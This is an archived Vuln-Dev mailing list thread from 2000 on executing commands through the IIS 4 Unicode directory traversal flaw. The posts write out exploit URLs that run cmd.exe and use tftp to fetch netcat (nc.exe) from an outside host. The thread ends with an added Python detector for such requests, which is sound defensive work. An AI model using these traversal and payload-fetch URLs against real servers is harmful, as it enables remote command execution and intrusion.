Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: booboo <booboo () 65535 COM>
Date: Tue, 14 Nov 2000 14:30:36 +0000
you can also normally swap the - with a / as in netstat+"-a" or netstat+/a

BooBoo

On Fri, 10 Nov 2000, Loschiavo, Dave wrote:

Thanks, looks like I inadvertently left the "get" out of the message. I was including that in the URL when testing. However, what I did notice was the use of the quotes in the "-i" area of the URL. I was not using quotes. Will have to give that a shot.

-thanks

-----Original Message-----
From: Robert A. Seace
To: DLoschiavo () frcc cc ca us
Cc: VULN-DEV () SECURITYFOCUS COM
Sent: 11/10/00 10:11 AM
Subject: Re: dos commands via iis 4 (TFTP)

In the profound words of Loschiavo, Dave:

I tried tftp commands in the URL, formatted like this:

http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/cmd.exe?/tftp+-i+192.168.1.20+nc.exe"

and got nowhere, while this:

http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/cmd.exe?/c+dir+c:

gave me a listing of the c: drive. Am I formatting the "TFTP" URL incorrectly?

Yeah, I think so... But, I'm no TFTP guru, either... Personally, I would just use RCP... However, looking at the original advisory on BugTraq, that mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"), I think you need a "GET" before the "nc.exe", and maybe a destination location specified after it, for where to place it on the NT box... For instance, it shows an URL of:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n cx99.exe+c:\winnt\system32\ncx99.exe
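
A defender-side check for the request pattern discussed in this thread, as an added example that is not part of the original posts: it folds overlong two-byte UTF-8 sequences such as %c0%af to the ASCII character they alias, the way a decoder without a shortest-form check would, then flags traversal and references to the executables named above. The function names and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Executables named in the thread's request URLs.
SUSPECT_EXES = ("cmd.exe", "tftp.exe")
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")  # 2-byte encoding of an ASCII char


def decode_lenient(target: str) -> str:
    """Percent-decode, folding overlong 2-byte UTF-8 forms to the ASCII
    character they alias (what a decoder without a shortest-form check does)."""
    data = unquote_to_bytes(target)
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        nxt = data[i + 1] if i + 1 < len(data) else 0
        if b in (0xC0, 0xC1) and 0x80 <= nxt <= 0xBF:
            out.append(((b & 0x1F) << 6) | (nxt & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")


def classify(target: str) -> list:
    """Return the reasons a request target (path plus query) looks hostile."""
    findings = []
    if OVERLONG.search(unquote_to_bytes(target)):
        findings.append("overlong-utf8")
    decoded = decode_lenient(target).replace("\\", "/").lower()
    if "../" in decoded:
        findings.append("traversal")
    if any(exe in decoded for exe in SUSPECT_EXES):
        findings.append("system-exe")
    return findings


# Constructed request targets, modelled on the URLs quoted in the thread.
SAMPLES = [
    "/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:",
    "/scripts/../../winnt/system32/cmd.exe?/c+dir",
    "/default.asp?name=caf%c3%a9",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s) or ["clean"], s)
```

The overlong-utf8 finding is the high-signal one: a valid UTF-8 request never contains the lead bytes C0 or C1, so any hit is either an evasion attempt or a broken client.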